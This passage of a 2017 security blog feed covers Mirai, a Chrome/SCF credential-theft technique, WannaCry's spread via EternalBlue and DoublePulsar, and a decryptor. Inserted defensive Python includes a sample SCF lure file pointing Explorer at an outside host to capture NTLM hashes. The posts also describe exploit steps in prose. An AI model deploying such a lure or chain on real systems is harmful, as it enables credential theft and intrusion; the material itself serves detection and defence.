  3. Mirai botnet. Used in some of the largest DDoS attacks ever, including one to silence Brian Krebs, Mirai scans the internet for Internet of Things devices using factory default credentials and infects them. What’s the scope of a Mirai attack? Ars Technica reported a Mirai DDoS on French web host OVH of 1.7 terabytes. That’s not the scary part. The scary part is that the IoT market is booming, and IoT vendors have one of the most abysmal records of security engineering and poor judgment ever seen. And as of 2016, the most conservative estimate for IoT devices on the market was 6.4 billion.


  4. RATs. Some of us are familiar with remote access tools used to spy on the unwitting and sometimes take compromising pictures. But what happens when a RAT is embedded in a SaaS tool? Tech support scammers have themselves been hit by third-party business services that sold their offering with DarkComet thrown in. Given how tough it can be to vet a SaaS offering, the potential to impact legitimate businesses is very large.


  5. The Computer Fraud and Abuse Act. Nobody likes fraud and abuse, so what’s the big deal with an act designed to keep them off of computers? Well, the act was written in 1986, prompted by a White House screening of the movie WarGames (no, really), and criminalized those who

“having knowingly accessed a computer without authorization or exceeding authorized access”

The “exceeding authorized access” clause has proved problematic in recent years, as the automated scraping of content, saving public data that the owner didn’t intend to make public, and landing on unexpected pages due to a website’s misconfiguration have all been interpreted as violations of the law at one point or another. This is absolutely scary, as the act and its capricious enforcement have led to a chilling effect on vulnerability disclosure and introduced a risk to researchers who might otherwise work with law enforcement.

These are all scary cyberthreats not because of their technical sophistication, but more because they are failures of organizations and institutions that manage technology. Your security team can patch a zero-day vulnerability, but not the executive that insists his password be set to ‘1234’ for ‘convenience.’ When you have strong organizations, the cyberthreats you face suddenly get much less scary.

The post 5 Unsettling cyberthreats appeared first on Malwarebytes Labs.


Stealing Windows credentials using Google Chrome

Malwarebytes - Tue, 05/23/2017 - 14:00

Security researcher Bosko Stankovic recently published an article explaining how an attacker could use Chrome, the SMB file sharing protocol, and Windows Explorer Shell Command Files to steal victims’ credentials.

The basic elements

Chrome

Similar attacks have been demonstrated using Internet Explorer and Edge, but being able to do this with a (very popular) third-party browser greatly increases the chances of this being used in the wild. Chrome uses a technique called MIME sniffing for files with text or text-like content, and it downloads such a file when it contains a non-printable character. It downloads these files to the default download folder specified in the Advanced Settings section of the Chrome Settings.

SMB protocol

This file sharing protocol recently gained a lot of fame by being exploited to spread the WanaCrypt ransomware worm. SMB is what Windows uses to share files, printers, and serial ports, and to communicate this information between computers. By design, clients make SMB requests and servers make the resources available after successful authentication. But as it turns out, this feature can be (ab)used for a lot more.

SCF files

Windows Explorer Shell Command Files (SCF) are basically shortcuts with a run command. A very noteworthy feature is that this extension stays invisible even if you have Explorer set to show extensions.

So you will have to take a really close look at a file that has a double extension like example.txt.scf to see the difference from an actual txt file.


Another thing that makes SCF files dangerous is that they are triggered as soon as the folder they are in is opened. Windows sends a request for the resource the very moment the file is shown in Windows Explorer.

The possible attack

The attacker plants an SCF file containing a non-printable character on a website that he knows his victim(s) frequent (a watering hole attack). Or, if the threat actor is after a bigger audience, he can rig a malvertising campaign or use social media.

Chrome users will get the SCF file downloaded to their default downloads folder and the next time they want to look at or move a file from that folder, the SCF file will be triggered as soon as the downloads folder is opened in Windows Explorer.

As explained, SCF files can be configured to contact a server with a request for a resource (i.e. a file). There are no restrictions, so this can be a remote server under the attacker’s control. In order to make the resource request, Windows needs to send an authentication request via SMB, which can be captured on the server. The request includes the victim’s username, domain, and NTLMv2 password hash. This information can be extremely useful for an attacker who wants to expand his foothold on a network.

The consequences

Once the attacker has the hashed password, how long it takes to recover the password depends on the strength of the password behind the hash. This can vary from mere seconds to a few days. In targeted attacks, you can be sure the username and hash will be checked against lists published after breaches to see whether a password has been re-used and can be matched with the hash even faster.

If the Windows 8/10 user is using Microsoft Authentication (MSA) to use Microsoft services like Office 365, OneDrive, Skype, and many others, the impact on the victims can be even bigger.


You have probably heard this before this week, but if you don’t need SMB, disable it. This is the only part of the attack chain the end user can easily manipulate, by executing a simple PowerShell command. Other options are:

  • Always use the “Save as…” option when you are knowingly downloading something, so you never have to open the default downloads folder.
  • Alter the file association for SCF files, which you would have to do in the registry. Changing the default value under the key HKEY_CLASSES_ROOT\.scf to “txtfile” makes the files visible and opens them in Notepad.

But disabling SMB is more likely to be successful, and it helps protect you against other malware like the WannaCry ransomware worm and the Adylkuzz cryptocurrency miner.
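As an added example (not code from the Malwarebytes post or from Stankovic’s research), the following Python checks files in a downloads folder for the traits described above: the .scf extension, a second extension hiding in front of it, a non-printable byte that makes Chrome download rather than display the file, and an INI-style value pointing Explorer at a remote resource. It assumes the SCF layout is INI-style text and that a remote resource is expressed as a UNC path value (\\host\share\...); the sample file contents and the 203.0.113.7 address are constructed.

```python
import re

# A UNC path value such as \\203.0.113.7\share\icon.ico (host, then share)
UNC_RE = re.compile(r"^\\\\[^\\\s]+\\\S")


def has_nonprintable(data: bytes) -> bool:
    """True if the bytes contain a control character other than tab, CR or LF."""
    return any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in data)


def unc_values(text: str) -> list:
    """Return every INI-style value (key=value line) that is a UNC path."""
    found = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") or "=" not in line:
            continue
        value = line.split("=", 1)[1].strip()
        if UNC_RE.match(value):
            found.append(value)
    return found


def inspect_download(name: str, data: bytes) -> list:
    """Return the reasons a downloaded file looks like an SCF credential lure.

    An empty list means nothing suspicious was seen.
    """
    reasons = []
    lower = name.lower()
    if not lower.endswith(".scf"):
        return reasons
    reasons.append("SCF file: Explorer evaluates it as soon as the folder is opened")
    stem = lower[:-len(".scf")]
    if "." in stem.strip("."):
        shown = stem.rsplit(".", 1)[1]
        reasons.append(f"double extension: .scf is hidden behind '.{shown}'")
    # SCF files are plain text; latin-1 never fails, so odd bytes survive the decode
    for value in unc_values(data.decode("latin-1")):
        reasons.append(f"remote resource {value}: Explorer would send an SMB request for it")
    if has_nonprintable(data):
        reasons.append("contains non-printable bytes (downloaded, not displayed, by Chrome)")
    return reasons


def scan_downloads(files: dict) -> dict:
    """Map name -> reasons for every file in `files` that raised at least one."""
    flagged = {}
    for name, data in files.items():
        reasons = inspect_download(name, data)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed samples (not real captures). 203.0.113.7 is a documentation address.
LURE = (b"[Shell]\r\nCommand=2\r\n"
        b"IconFile=\\\\203.0.113.7\\share\\icon.ico\r\n"
        b"[Taskbar]\r\nCommand=ToggleDesktop\r\n\x01")
SHOW_DESKTOP = (b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
                b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
SAMPLE_DOWNLOADS = {
    "invoice.txt.scf": LURE,
    "Show Desktop.scf": SHOW_DESKTOP,
    "notes.txt": b"just a text file\r\n",
}

if __name__ == "__main__":
    for name, reasons in scan_downloads(SAMPLE_DOWNLOADS).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

To run it over a real Downloads folder, build the dict from os.listdir and the file bytes; a legitimate “Show Desktop.scf” style file gets a single low-value hit, while a file that combines the .scf extension with a UNC reference is the case where the captured NTLMv2 hash should be treated as exposed and the password changed.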


This article explains how Chrome users are at risk of spilling their Microsoft Authentication credentials by simply visiting the wrong site.


Pieter Arntz

The post Stealing Windows credentials using Google Chrome appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Ransomware targets Tencent users

Malwarebytes - Mon, 05/22/2017 - 14:00

Early this April, an increase in infections by a variant of ransomware known as Android/Ransom.SLocker.fh was observed.

Ransomware targets Tencent users

An especially relevant trait of SLocker.fh is its use of Tenpay to send payment to the criminals. Tenpay is an integrated payment platform by Tencent, one of China’s largest Internet service portals. Thus, it is no surprise that SLocker.fh originates from China.

In order to pay, users must have a QQ ID to send the payment to, which is provided. Since Tencent’s most popular platform is QQ Instant Messenger, the criminals are probably targeting these users the most.

Various iterations to fool users

Like many Android ransomware apps, SLocker.fh masquerades as various legitimate apps to fool users into granting escalated rights. Users who accept the escalated rights will have their device forcibly rebooted. After the reboot, the device is locked by an overlay screen with instructions to pay.

Stay protected

Because Android ransomware is on the rise, users should be extra cautious. You can protect yourself by being cautious about giving superuser and/or device administrator rights to any app that asks for them. If the app looks shady, like the two examples above, this is especially true.

So you’re infected with ransomware

A good anti-malware scanner like Malwarebytes Anti-Malware Mobile can remove the ransomware, but only BEFORE escalated rights are granted. Afterward, it becomes a bit harder. For how to remove such infections, refer to the blog post “Difficulty removing Koler Trojan or other ransomware on Android?”

As always, stay safe out there.

The post Mobile Menace Monday: Ransomware targets Tencent users appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 15 – May 21)

Malwarebytes - Mon, 05/22/2017 - 13:59

Last week was dominated by the WannaCry ransomware and the discussions that ensued. We published:

Others discussed:

In other news we celebrated Privacy Awareness Week, highlighting the two main themes:

  1. Share with care.
  2. Trust and transparency.

And we gave out some pointers on what to consider and how to act when you have reason to believe that your personal information was stolen.

Other important security news:

  • Researchers from Carnegie Mellon University, Seagate, and the Swiss Federal Institute of Zurich published a paper entitled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques.” Our friends at Bleeping Computer explained the vulnerability found in SSD drives.
  • A Croatian security investigator has discovered a new network worm that uses 7 tools and exploits from the US intelligence service NSA. The worm is called EternalRocks, but its original name is “MicroBotMassiveNet”.
  • Wikileaks has brought out information about other CIA tools called Athena and Hera, spyware designed to take full, remote control over infected Windows PCs.

In non-security news, we were amazed by this jewel telling us that scientists at UCLA and the University of Connecticut managed to create a protein-based battery-like device that extracts energy from the human body which could potentially be used to power implants like pacemakers.

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (May 15 – May 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

WannaDecrypt your files? The WannaCry solution, for some

Malwarebytes - Fri, 05/19/2017 - 20:11

We just wanted to shoot out a quick blog post to let you know about a decryptor (Wanakiwi) that has been developed for WannaCry/WannaCrypt/wCrypt. There is a catch, though: it only works for the following operating systems:

  • Windows XP
  • Windows Server 2003
  • Windows Vista
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows 7

So if you’ve got a WannaCry infection on one of the above operating systems, there is hope!


The decryptor is only going to work if you haven’t restarted the infected system and you haven’t killed the ransomware process (should be wnry.exe or wcry.exe) so please don’t restart or kill the process if you want to get those files back!


In order to use this tool, you first need to download it from here.

This tool essentially searches the system’s memory for prime numbers and pieces together the encryption key used. However, it relies on current running memory so once you reboot it will be gone and if you’ve done too much on the system since infection, it’s possible the key won’t be found (because it’s been overwritten by data from other applications using the same memory space).
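To make the “searches the system’s memory for prime numbers” step concrete, here is an added Python toy that is not the Wanakiwi code: it generates a small RSA key, plants one prime factor in a constructed “memory” buffer of random bytes, then finds it the way the post describes, by sliding a prime-sized window over memory and keeping any value that divides the public modulus. With that factor the private exponent is rebuilt and a wrapped file key is unwrapped. Key sizes and the memory buffer are tiny and constructed so it runs offline; confirming a candidate by dividing the known modulus is my assumption about how the check is done.

```python
import math
import random


def is_probable_prime(n: int, rounds: int = 16, rng: random.Random = random.Random(0)) -> bool:
    """Miller-Rabin primality test (deterministic here because rng is seeded)."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits: int, rng: random.Random) -> int:
    """Random prime with exactly `bits` bits (top and bottom bits forced on)."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def gen_keypair(bits: int, rng: random.Random, e: int = 65537):
    """Toy RSA keypair (p, q, n, e, d). Deliberately tiny; never use for real data."""
    while True:
        p, q = gen_prime(bits // 2, rng), gen_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p, q, p * q, e, pow(e, -1, phi)


def build_memory_image(p: int, prime_len: int, rng: random.Random, size: int = 4096):
    """Constructed 'process memory': random junk with p's little-endian bytes planted."""
    mem = bytearray(rng.getrandbits(8) for _ in range(size))
    offset = rng.randrange(0, size - prime_len)
    mem[offset:offset + prime_len] = p.to_bytes(prime_len, "little")
    return bytes(mem), offset


def find_prime_in_memory(memory: bytes, n: int, prime_len: int):
    """Slide a prime-sized window over memory; a window that divides n is a factor."""
    for off in range(len(memory) - prime_len + 1):
        cand = int.from_bytes(memory[off:off + prime_len], "little")
        if cand > 1 and cand % 2 == 1 and n % cand == 0:
            return cand, off
    return None


def reconstruct_private_exponent(p: int, n: int, e: int) -> int:
    """With one factor known, the other is n // p and d follows from phi(n)."""
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def run_demo(seed: int = 2017, bits: int = 256) -> dict:
    rng = random.Random(seed)
    p, q, n, e, d = gen_keypair(bits, rng)
    file_key = rng.getrandbits(128)      # stands in for a per-file symmetric key
    wrapped = pow(file_key, e, n)         # what the ransomware leaves on disk
    prime_len = (bits // 2 + 7) // 8
    memory, planted = build_memory_image(p, prime_len, rng)
    hit = find_prime_in_memory(memory, n, prime_len)
    if hit is None:
        return {"recovered": False}
    found_p, found_at = hit
    d2 = reconstruct_private_exponent(found_p, n, e)
    return {
        "recovered": pow(wrapped, d2, n) == file_key,
        "d_matches": d2 == d,
        "planted_offset": planted,
        "found_offset": found_at,
    }


if __name__ == "__main__":
    print(run_demo())
```

The window scan is why a reboot or heavy use of the machine kills the recovery: once the bytes of p are overwritten, no window divides n and the search comes back empty, exactly the failure mode the post warns about.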

To run it, download the linked file (above) and extract the .zip to a folder on your desktop (if you can download the file from a clean system and then transfer it via USB, you run less risk of overwriting the key in memory).

Next, you can either double click it (boring) or open the command prompt (Start + CMD) and run it through there (fun!).

The tool will automatically identify the WannaCrypt processes running on the system if they are called wnry.exe or wcry.exe, but if for some reason it can’t find them, check the running applications on your system (Task Manager/Process Explorer), find the offender (it’s pretty obvious), identify its Process Identification Number (PID), and pass that on the command line after wanakiwi.exe.

It might take a few minutes for the tool to find the key (or many minutes in some cases), but once it’s found the tool is going to start searching your system for encrypted files and decrypt them automatically.


After the tool finishes decrypting your files, you are going to be left with a ransom note as a background and lots of encrypted files next to your unencrypted files.

Here are some possible next steps:

  • Download Malwarebytes 3.0 (or whatever scanning tool you prefer that can clean up WannaCry) and run a scan on the system to identify all artifacts related to WannaCry. This will help you get the malware off the system in case it tries to encrypt again.
  • Restart the computer to finish clean-up.
  • Find all the most important files you want to keep and move them to some form of backup.
  • Wipe the system and reinstall Windows.
  • OR you can just go through your system looking for all files with the .WNCRY extension and get rid of them.

The original memory scrubbing, prime number searching WannaKey decryptor tool (for XP) was written by Adrien Guinet (@adriengnt) and then used as the base for Wanakiwi developed by Benjamin Delpy (@gentilkiwi). These guys are incredibly talented and deserve a round of applause!

We found out about the tool thanks to the very extensive blog post by Matt Suiche (@msuiche), which you should check out to get more information about how these tools work. You might remember Matt from his assistance in stopping a variant of the WannaCry released last week by registering the killswitch domain.


We didn’t want to write about this tool until we tested it in some capacity. A lot of other security researchers have given it a go and it seems that the tool works well in lab environments (sometimes). I personally tested it on a Windows 7 system using the following sample (with mixed results):


  • My first test worked like a charm.
  • My second test with a new profile (for taking screenshots for this post) couldn’t actually launch the malware.
  • My third test launched the malware, but the decryptor took forever and eventually never found the key.
  • My fourth test worked like a charm again (original profile).
  • Some of our other researchers tried it and were unable to get the tool to find the key.

This tool was put together very quickly, and it’s meant to help those that it can help, which is likely not everybody. I wouldn’t recommend putting all your eggs in one basket and counting on being able to decrypt with this tool if you get hit, because either:

  • You are likely going to be unable to recover the key, OR
  • The malware will be modified to clean up the running memory or force a reboot after install, making the tool ineffective

But if you are currently dealing with a WannaCry infection, you have barely touched the infected system(s), and you are running one of the operating systems listed at the beginning of this post, running the tool is not going to break anything that isn’t already broken so it’s worth a shot just to see if you can get those files back.

That being said, once again big thanks to @adriengnt, @gentilkiwi & @msuiche for their hard work, information spreading and ingenious development skills.

Let us know in the comments if this tool worked for you (and your configuration too!)

The post WannaDecrypt your files? The WannaCry solution, for some appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How did the WannaCry Ransomworm spread?

Malwarebytes - Fri, 05/19/2017 - 14:00

Security researchers have had a busy week since the WannaCry ransomware outbreak that wreaked havoc on computers worldwide. News of the infection and the subsequent viral images showing everything from large display terminals to kiosks being affected created pandemonium in ways that haven’t been seen since possibly the MyDoom worm circa 2004.

News organizations and other publications were inundating security companies with requests for information to provide to the general public – and some were all too happy to oblige. Information quickly spread that a malicious spam campaign had been responsible for circulating the malware. This claim will usually be a safe bet, as ransomware is often spread via malicious spam campaigns. Admittedly, we also first thought the campaign may have been spread by spam and subsequently spent the entire weekend poring through emails within the Malwarebytes Email Telemetry system searching for the culprit. But like many others, our traps came up empty.

Claims of WannaCry being distributed via email may have been an easy mistake to make. Not only was the malware outbreak occurring on a Friday afternoon, but around the same time a new ransomware campaign was being heavily distributed via malicious email and the popular Necurs botnet. We recently wrote about the Jaff ransomware family and the spam campaign that was delivering it.

Some may have seen the rash of news occurring on their feeds, an uptick in ransomware-themed document malware in their honeypots, and then jumped to conclusions as a way to be first with the news.

But here at Malwarebytes we try not to do that. And now after a thorough review of the collected information, on behalf of the entire Malwarebytes Threat Intelligence team, we feel confident in saying those speculations were incorrect.

Indeed, the ‘ransomworm’ that took the world by storm was not distributed via an email malspam campaign. Rather, our research shows this nasty worm was spread via an operation that hunts down vulnerable public facing SMB ports and then uses the alleged NSA-leaked EternalBlue exploit to get on the network and then the (also NSA alleged) DoublePulsar exploit to establish persistence and allow for the installation of the WannaCry Ransomware.

We will present information to support this claim by analyzing the available packet captures, binary files, and content from within the information contained in the ShadowBrokers dump, and correlating what we know thus far regarding the malware infection vector.

Here’s what we know

EternalBlue

EternalBlue is an SMB exploit affecting various Windows operating systems from XP to Windows 7 and various flavors of Windows Server 2003 and 2008. The exploit technique is known as heap spraying and is used to inject shellcode into vulnerable systems, allowing for exploitation of the system. The code is capable of targeting vulnerable machines by IP address and attempting exploitation via SMB port 445. The EternalBlue code is closely tied to the DoublePulsar backdoor and even checks for the existence of that malware during the installation routine.

EternalBlue checks for DoublePulsar

EternalBlue strings

Bits of information obtained by reviewing the EternalBlue-2.2.0.exe file help demonstrate the expected behavior of the software. The screenshot above shows that the malware:

  • Sends an SMB Echo request to the targeted machine
  • Sets up the exploit for the target architecture
  • Performs SMB fingerprinting
  • Attempts exploit
  • If successful exploitation occurs, WIN
  • Pings the backdoor to get an SMB reply
  • And if the backdoor is not installed, it’s game on!

The ability of this code to beacon out to other potential SMB targets allows for propagation of the malicious code to other vulnerable machines on connected networks. This is what made the WannaCry ransomware so dangerous. The ability to spread and self-propagate causes widespread infection without any user interaction.


DoublePulsar is the backdoor whose presence EternalBlue checks for; the two are closely tied together.

This particular malware uses an APC (Asynchronous Procedure Call) to inject a DLL into the user mode process of lsass.exe. Once injected, exploit shellcode is installed to help maintain persistence on the target machine. After verifying a successful installation, the backdoor code can be removed from the system.

DoublePulsar Parameters

The purpose of the DoublePulsar malware is to establish a connection allowing the attacker to exfiltrate information and/or install additional malware (such as WannaCry) on the system. These connections allow an attacker to establish a Ring 0 level connection via the SMB (TCP port 445) and/or RDP (TCP port 3389) protocols.

DoublePulsar Ring0 Connections

Network analysis

Taking a look at the wannacry.pcap file shared to VirusTotal by @benkow_ helps us attribute the previously discussed code as the infection vector via the initial calls of the attack cycle.

A high-level view of a compromised machine in Argentina ( that attacked the honeypot:

The widely publicized kill-switch domain is present in the pcap file. As was reported, the malware made a DNS request to this site. Until @MalwareTech inadvertently shut down the campaign by registering the domain, the malware would use this as a mechanism to determine if it should run.

DNS lookup to Sinkhole

The SMB traffic is also clearly visible in the capture. These SMB requests are checking for vulnerable machines using the exploit code above.

SMB Requests

The exploit sends an SMB ‘trans2 SESSION_SETUP’ request to the infected machine. According to SANS, this is short for Transaction 2 Subcommand Extension and is a function of the exploit. This request can determine if a system is already compromised and will issue different response codes to the attacker indicating ‘normal’ or ‘infected’ machines.

Diving into the .pcap a bit more, we can indeed see this SMB Trans2 command and the subsequent response code of 81 which indicates an infected system. If the attacker receives this code in response, then the SMB exploits can be used as a means to covertly exfiltrate data or install software such as WannaCry.

Trans2 Multiplex ID
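An added example, not from the Malwarebytes write-up: a Python parser that classifies a captured Trans2 response by its Multiplex ID, the field the caption above points at. 81 decimal is 0x51; the value 0x41 for a clean host’s echo, and STATUS_NOT_IMPLEMENTED (0xC0000002) used in the constructed replies, are taken from public DoublePulsar detection write-ups rather than from this post. The captures and the 192.0.2.x addresses are constructed, so this runs offline against bytes rather than against a live host.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
STATUS_NOT_IMPLEMENTED = 0xC0000002
MID_CLEAN = 0x41      # a clean host echoes the probe's Multiplex ID back unchanged
MID_INFECTED = 0x51   # 81 decimal, the value the post calls out
# SMB1 header after the 4-byte magic: Command, Status, Flags, Flags2, PIDHigh,
# SecurityFeatures(8), Reserved(2), TID, PIDLow, UID, MID (all little-endian)
HEADER_FMT = "<BIBHH8x2xHHHH"
HEADER_LEN = 4 + struct.calcsize(HEADER_FMT)   # 32 bytes
FIELDS = ("command", "status", "flags", "flags2", "pid_high",
          "tid", "pid_low", "uid", "mid")


def parse_smb1_header(packet: bytes) -> dict:
    """Parse the NetBIOS session header plus the 32-byte SMB1 header."""
    if len(packet) < 4 + HEADER_LEN:
        raise ValueError("packet too short for an SMB1 header")
    nb_len = int.from_bytes(packet[1:4], "big")
    smb = packet[4:4 + nb_len]
    if len(smb) < HEADER_LEN or smb[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    return dict(zip(FIELDS, struct.unpack_from(HEADER_FMT, smb, 4)))


def classify_trans2_response(packet: bytes) -> str:
    """Verdict for one reply to a Trans2 SESSION_SETUP probe."""
    try:
        hdr = parse_smb1_header(packet)
    except ValueError:
        return "malformed"
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "not-trans2"
    if hdr["mid"] == MID_INFECTED:
        return "infected"
    if hdr["mid"] == MID_CLEAN:
        return "clean"
    return "unknown"


def build_trans2_response(mid: int, status: int = STATUS_NOT_IMPLEMENTED) -> bytes:
    """Constructed reply shaped like a host's answer to the Trans2 probe."""
    smb = SMB_MAGIC + struct.pack(HEADER_FMT, SMB_COM_TRANSACTION2, status,
                                  0x98, 0xC807, 0, 0, 0xFEFF, 0, mid)
    smb += b"\x00\x00\x00"   # WordCount=0, ByteCount=0: empty parameter/data blocks
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def triage(captures: dict) -> dict:
    """host -> verdict for a dict of captured reply packets."""
    return {host: classify_trans2_response(pkt) for host, pkt in captures.items()}


# Constructed captures; 192.0.2.x are documentation addresses.
CAPTURES = {
    "192.0.2.10": build_trans2_response(MID_CLEAN),
    "192.0.2.11": build_trans2_response(MID_INFECTED),
    "192.0.2.12": b"\x00\x00\x00\x05hello",
}

if __name__ == "__main__":
    for host, verdict in triage(CAPTURES).items():
        print(host, verdict)
```

Feed it the reply packets extracted from a capture like the wannacry.pcap discussed above and any host that answers with Multiplex ID 0x51 is one to isolate first; a response with any other ID is not proof of a clean host, only the absence of this particular beacon.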

Putting it all together

The information we have gathered by studying the DoublePulsar backdoor capabilities allows us to link this SMB exploit to the EternalBlue SMB exploit. It’s really not hard to do so, as both were patched as part of the MS17-010 Security Bulletin prior to this event, and as previously mentioned, were both released in the well-publicized ShadowBrokers-NSA dumps.

Without otherwise definitive proof of the infection vector via user-provided captures or logs, and based on the user reports stating that machines were infected when employees arrived for work, we’re left to conclude that the attackers initiated an operation to hunt down vulnerable public-facing SMB ports and, once located, used the newly available SMB exploits to deploy malware and propagate to other vulnerable machines within connected networks.

Developing a well-crafted campaign to identify as few as a few thousand vulnerable machines would allow for the widespread distribution of this malware on the scale and at the speed that we saw with this particular ransomware variant.

So what did we learn?

Don’t jump to conclusions. Malware analysis is difficult and it can take some time to determine attribution to a specific group, and/or to assess the functionality of a particular campaign – especially late on a Friday (which BTW, can all you hackers quit making releases on Fridays!!). First, comes stopping the attack, second comes analyzing the attack. Remember, patience is a virtue.

Update, update, UPDATE! Microsoft released patches for these exploits prior to their weaponization. Granted, patches weren’t available for all Operating Systems, but the patch was available for the vast majority of machines. This event even forced Microsoft to release a patch for the long-ago EOL Windows XP – which gets back to the first thing that was said. UPDATE! Why are there still machines on XP!? These machines are vulnerable (beyond this attack) to the ransomware functionality of this attack and they need to be updated.

Disable unnecessary protocols. SMB is used to transfer files between computers. The setting is enabled on many machines but is not needed by the majority. Disable SMB and other communications protocols if not in use.

Network Segmentation is also a valuable suggestion as such precautions can prevent such outbreaks from spreading to other systems and networks, thus reducing exposure of important systems.

And finally, don’t hoard exploits. Microsoft president Brad Smith used this event to call out the ‘nations of the world’ to not stockpile flaws in computer code that could be used to craft digital weapons.

That reminds me of an article I wrote a few years ago (and which was substantially cut for length) about Hacking Team and the government sanctioned use of exploits.

Hack Me: A Geopolitical Analysis of the Government Use of Surveillance Software

I guess things haven’t changed…

The post How did the WannaCry Ransomworm spread? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Information stolen? What now?

Malwarebytes - Thu, 05/18/2017 - 15:00

There are several different types of malware that look for interesting information on an infected computer and transmit that information to the threat actor.

Identifying and removing the malware is our job, but what do you need to do yourself to control the aftermath? To answer that question it’s important to know what information the malware was after and sometimes how long it has been active.


What types of information are the malware authors after? Most of the time they are after anything that they can turn into cash. In rare cases of targeted attacks, they could be after other confidential information. Consider for example a keylogger installed by a close relative who is curious about some aspects of your private life.

But usually we can divide the sought-after information into these categories:

  • Banking details
  • Shopping website credentials
  • Other website credentials
  • Gaming credentials
  • Bitcoin and other eMoney wallets
  • Email credentials

Time period

When is the infection period important and why? It is important in cases of malware that tracks the user’s activities like keyloggers and malware that intercepts internet traffic. It should be clear that knowing when this tracking started can be very helpful in determining which important information could have been stolen.

Tip: do not rely on your memory too much. If you are not sure, change that password of which you are unsure whether you have used it recently.

How do I recognize malware that has stolen information?

Sometimes you can tell by our naming convention that a particular malware was after your information. But not all of them are called Spyware.PasswordStealer. For starters, look up information about the detection on your machine. Alarm bells should be ringing if the detections are spyware, keyloggers, or backdoors, although other Trojans are capable of stealing information as well.

In our threat library you can find information of this kind under the header Remediation, so look for your detection there if this applies to you.


In most cases, this is easy to guess. The stolen information could be used in ways that will cost you money. What could be the threat actors goals?

  • Withdrawing money from your accounts
  • Shopping at your expense
  • Impersonating you for other reasons
  • Extortion with personal information (doxing, sextortion, etc.)

What can you do to limit the dangers as much as possible?

  • Change the passwords that might have been stolen for every website you can remember logging into.
  • If your email account has been compromised, change that password first as other credentials may be sent to you by mail and still end up in the wrong hands. Some webshops even send you a password in plain-text (shudders).
  • Keep a close eye on your banking and eMoney accounts. Use the activity alerts that some banks offer.
  • Keep tabs on your posts in social media. It may look silly to check what you have supposedly posted yourself, but imagine someone else doing it for you.
Extra precautions

Related article

Info stealers

Stay safe out there and get protected.


Pieter Arntz

The post Information stolen? What now? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Privacy Awareness Week: A primer

Malwarebytes - Wed, 05/17/2017 - 15:00

The Asia Pacific Privacy Authorities (APPA) began an initiative called Privacy Awareness Week, or PAW, with the purpose of educating users about current privacy issues and promoting the importance of keeping their personal information safe.

This has remained its core purpose for more than a decade now.

For those who may not be familiar with what this campaign is all about, this post aims to answer the questions you may have in mind about PAW.

When is Privacy Awareness Week?

APPA typically celebrates Privacy Awareness Week in May every year. Since the organization has a number of member countries, they each decide on when they want to hold the event locally.

In the first week of May, Singapore held its PAW locally. Hong Kong, New Zealand, and the United States held their own campaigns in the second week of May.

Australia is celebrating Privacy Awareness Week this week.

Are there other countries that will hold this event?

There are a total of 11 member countries comprising APPA. Aside from those already mentioned, Canada, Colombia, Korea, Macao, Mexico, and Peru are or will also be celebrating this campaign.

What’s the theme of this year’s Privacy Awareness Week?

There are two themes that APPA members are using: “Share with care” and “Trust and transparency”.

Share with care. This stresses the importance of caring for your privacy, given that our current technological landscape is heavily data-driven. It also reminds users to think about what may or may not happen to their personal information once it has been shared.

Trust and transparency. Trust and transparency are vital to each other, as people normally expect one to exist with the other. Case in point: it is important for businesses to gain the trust of their clients, and it is important for clients to know that the businesses they trust are clear about what they do with, how they store, and how they use what clients give them, which in this case is their personal information.

Can we celebrate Privacy Awareness Week even if our country is not a member of APPA?

Privacy Awareness Week is about educating users concerning privacy. There are ways individuals and organizations can celebrate PAW. One example is to use social media to raise awareness to your followers. Another is to do a refresher of your organization’s privacy policy. If they don’t have one, why not encourage your organization to make one?

Privacy and security go hand in hand. Practicing solid cybersecurity hygiene coupled with a fair familiarity of how personal data changes hands can bring about positive experiences to our digital lives. As such, we encourage you, dear Reader, to check out some of our previous posts and reacquaint yourselves on how you can keep your data safe and your computing devices secure:

Happy Privacy Awareness Week, everyone, wherever you are, and remember to share your personal info with care!


The Malwarebytes Labs Team

The post Privacy Awareness Week: A primer appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Wanna Cry some more? Ransomware roundup special edition

Malwarebytes - Mon, 05/15/2017 - 21:25

Whether you call it WannaCry, WannaCrypt, WCrypt, Wanacrypt0r, WCry, or one of the other names currently vying for the “call me this” crown, the ubiquitous ransomware which brought portions of the UK’s NHS to its knees over the weekend, along with everything from train stations to ATM machines, is still with us and causing mayhem worldwide. As a result, our regular roundup has been replaced with what will hopefully serve as a useful place to collect links related to the attack.

First things first: this was a big enough incident that Microsoft created a special patch for Windows XP users, some three years after it had the plug pulled on support. Regardless of Windows OS, go get your update.

